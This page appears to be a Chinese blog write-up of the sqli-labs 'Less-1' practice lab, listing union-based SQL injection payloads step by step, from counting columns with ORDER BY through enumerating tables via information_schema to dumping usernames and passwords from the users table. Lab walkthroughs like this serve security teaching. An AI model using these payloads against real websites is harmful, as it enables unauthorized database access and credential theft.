当前位置: 首页 > news >正文

sql注入——靶场Less1

news 2025/6/18 6:24:17

?id=1

?id=99'union select 1,2,3--+
查看占位

?id=1' order by 3--+

尝试出表有几列

 ?id=1' order by 4--+

说明只有三列

?id=99' union select 1,database(),3--+

查询当前使用的数据库的名称

?id=99' union select 1,group_concat(table_name),3 from information_schema.tables where table.schema='security'--+

查询security表中有哪些表

?id=99' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+

查询users表中有哪些信息

?id=99' union select 1,group_concat(concat_ws(';',username,password)),3 from security.users--+

展示所有users表中的信息

http://www.lryc.cn/news/476721.html

相关文章:

  • docker file容器化部署Jenkins(一)
  • ArkTS组件继承的高级用法
  • 第十二章 spring Boot+shiro权限管理
  • jmeter基础01-3_环境准备-Linux系统安装jdk
  • 数字证书的简单记录
  • ssm基于SSM的校内信息服务发布系统的设计与实现+vue
  • Java 教程简介
  • 【C/C++】【三种方法】模拟实现strlen
  • 外贸平台开发多语言处理的三种方式
  • 学习GCC
  • B2109 统计数字字符个数
  • springboot Lark扫码登录
  • 中专女生数赛疑云:阿里蒙冤,学校之过,尽显世态炎凉
  • 【neo4j】 图数据库neo4j cypher单一语句 optional 可选操作的技巧
  • ip地址分为几大类-IP和子网掩码对照表
  • 第四篇: 用Python和SQL在BigQuery中进行基础数据查询
  • OpenCV中使用EdgeDrawing模块查找圆
  • C++在游戏领域的主要应用
  • 基于SpringBoot的“CSGO赛事管理系统”的设计与实现(源码+数据库+文档+PPT)
  • Web Broker(Web服务应用程序)入门教程(2)
  • redis:list列表命令和内部编码
  • .Net Core Configuration用法
  • 分享一些企业选择管理顾问公司的成功经验
  • 「Qt Widget中文示例指南」如何实现窗口嵌入?
  • 企业CRM选型必看:2024年最佳CRM系统排行
  • SQL入门的基础知识
  • JS渗透(安全)
  • 淘宝扭蛋机小程序,功能优势分析
  • Redis 数据备份与恢复
  • CentOS9 Stream 设置禁用IPV6